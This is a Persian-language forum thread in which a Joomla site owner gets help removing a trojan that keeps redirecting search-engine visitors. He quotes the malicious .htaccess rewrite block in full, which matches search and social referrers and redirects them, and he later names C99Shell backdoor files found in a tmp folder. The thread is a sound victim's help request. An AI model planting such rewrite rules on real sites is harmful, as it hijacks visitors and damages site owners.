حذف تروجان از هاست - جوملا

[hamidsajjadieh]

با سلام
بنده چند ماهی هست که یه سایت راه اندازی کردم
وقتی توی گوگل یا یاهو و ... یکی از صفحات سایتو سرچ میکنم آدرسو میاره ولی وقتی روش کلیک میکنم به این آدرس دایرکت میشه :
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]


البته آگه آدرسو دستی بزنم سایت باز میشه ولی تو موتورهای جستجو به اون آدرسی که نوشتم میره
یکم تحقیق کردم و فهمیدم که تو هاست من یه تروجان قرار گرفته به نام
BLACKLISTED:35


این اطلاعاتو از سایت معتبر [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] گرفتم
خود این سایت هاست منو اسکن کرد و بهم گفت که این تروجان روشه
کار این تروجان به این صورته که میاد و فایل .htaccess را دستکاری میکنه و این قسمتو بهش اضافه میکنه


<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|ex cite|altavista|msn|netscape|aol|hotbot|goto|infose ek|mamma|alltheweb|lycos|search|metacrawler|bing|d ogpile|facebook|twitter|blog|live|myspace|mail|yan dex|rambler|ya|aport|linkedin|flickr|nigma|liveint ernet|vkontakte|webalta|filesearch|yell|openstat|m etabot|nol9|zoneru|km|gigablast|entireweb|amfibi|d moz|yippy|search|walhello|webcrawler|jayde|findwha t|teoma|euroseek|wisenut|about|thunderstone|ixquic k|terra|lookle|metaeureka|searchspot|slider|topsev en|allthesites|libero|clickey|galaxy|brainysearch| pocketflier|verygoodsearch|bellnet|freenet|firebal l|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar| suchnase|schnellsuche|sharelook|sucharchiv|suchbie ne|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orang e|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|te lfort|hispavista|passagen|spray|eniro|telia|bluewi n|sympatico|nlsearch|atsearch|klammeraffe|shareloo k|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|d affodil|click4choice|exalead|findelio|gasta|gimpsy |globalsearchdirectory|hotfrog|jobrapido|kingdomse ek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan |qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|ex press|bestireland|browseireland|finditireland|iese arch|ireland-information|kompass|startsiden|confex|finnalle|gul esider|keyweb|finnfirma|kvasir|savio|sol|startside n|allpages|america|botw|chapu|claymont|clickz|clus h|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] [R=301,L]
</IfModule>


این کار باعث میشه که موتورهای جستجو سایت منو به آدرس [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] ریدایرکت کنند


حتی اگه باز من این فایلو تصحیح کنم بعد از حدود 20 دقیقه دوباره این قسمت به فایل اضافه میشه


سوالم اینه که :
1- با وجودی که کن پرمیشن این فایلو روی 444 تنظیم کردم چطور میتونه اونو تغییر بده؟
2- چطوری میشه این تروجانو حذف کنم؟




از بزرگان و اساتید محترم میخوام که جوابگو باشند
خیلی خیلی متشکرم

[jalal_iranian]

با سلام

با پشتیبانی هاست تماس گرفتید؟

یا علی

[hamidsajjadieh]

با سلام

با پشتیبانی هاست تماس گرفتید؟

یا علی

بله
اونها بهم گفتند که من باید کل هاستو پاک کنم و از اول همه چیزو نصب کنم که این واسه من غیر ممکنه به خاطر اینکه همه چیزا پاک میشند.من نمیتونم این کارو بکنم . من میخوام یه جوری (دستی یا با ابزار خاصی) تروجان را غیر فعال یا پاکسازی کنم
متشکرم

[jalal_iranian]

پیشنهاد میکنم هاستتون رو عوض کنید.

[poonoodi]

سلام

انطور که گفته شده :
This malware is generally hidden inside the HTML or PHP files

پیشنهاد میکنم فایل هاتون رو دانلود و با انتی ویروس مناسب اسکن کنید

لطفا نتیجه رو بیان کنید


موفق باشید

[hamidsajjadieh]

سلام

انطور که گفته شده :
This malware is generally hidden inside the HTML or PHP files

پیشنهاد میکنم فایل هاتون رو دانلود و با انتی ویروس مناسب اسکن کنید

لطفا نتیجه رو بیان کنید


موفق باشید

با سلام

حتما این کارو میکنم و نتیجه را در همون صفحه اعلام مبکنم

[hamidsajjadieh]

دوستان من از هاستم بک آپ گرفتم و اونو با کسپر اسکن کردم . 3 تا مورد پیدا کرد به نام Backdoor.PHP.C99Shell.cn که در Public_html/tmp/mod_spo654654654/air.php و Public_html/tmp/mod_spo654654654/air.txt1 و Public_html/tmp/mod_spo654654654/air.txt2 قرار دارند . ولی ظاهرا آنتی ویروس من نتونتس پاکسازی کنه.

حالا به نظر شما من برم توی هاست و کلا هر چی تو فولدر tmp هست رو پاک کنم؟
یا بگردم با یه آنتی ویروس بروز فایل بک آپ رو اسکن و پاکسازی و در آخر اونو تو هاست آپلود کنم و دوباره نصب کنم؟

[محمد محسنی]

با سلام

شما نیازی به فایل های پوشه tmp ندرید ومیتوانید همه را پاک کنید.

در ضمن سطح دسترسی پوشه مربوطه را چک نمایید.

یا حق.

[hamidsajjadieh]

دوستان عزیز
خواهش میکنم همه توجه کنید
ماژول simple page option یه ماژولی است که آلوده به تروجانه


از بزرگان این سایت خواهش دارم که در این مورد تحقیق کنند و نتیجه را به همه اعلام کنند تا کسی با مشکلی شبیه به من مواجه نشه


در ضمن این ماژول ایمیلهای جعلی زیادی را در غیاب شما در سراسر اینترنت پخش میکنه .


از همه شماها ممنونم

[hamidsajjadieh]

من پوشه tmp را حذف کردم . به نظر مشکل حل شده و تا الان که سایت داره به درستی کار میکنه


متشکرم

از کاربران محمد محسنی - poonoodi - jalal_iranian تشکر ویژه میکنم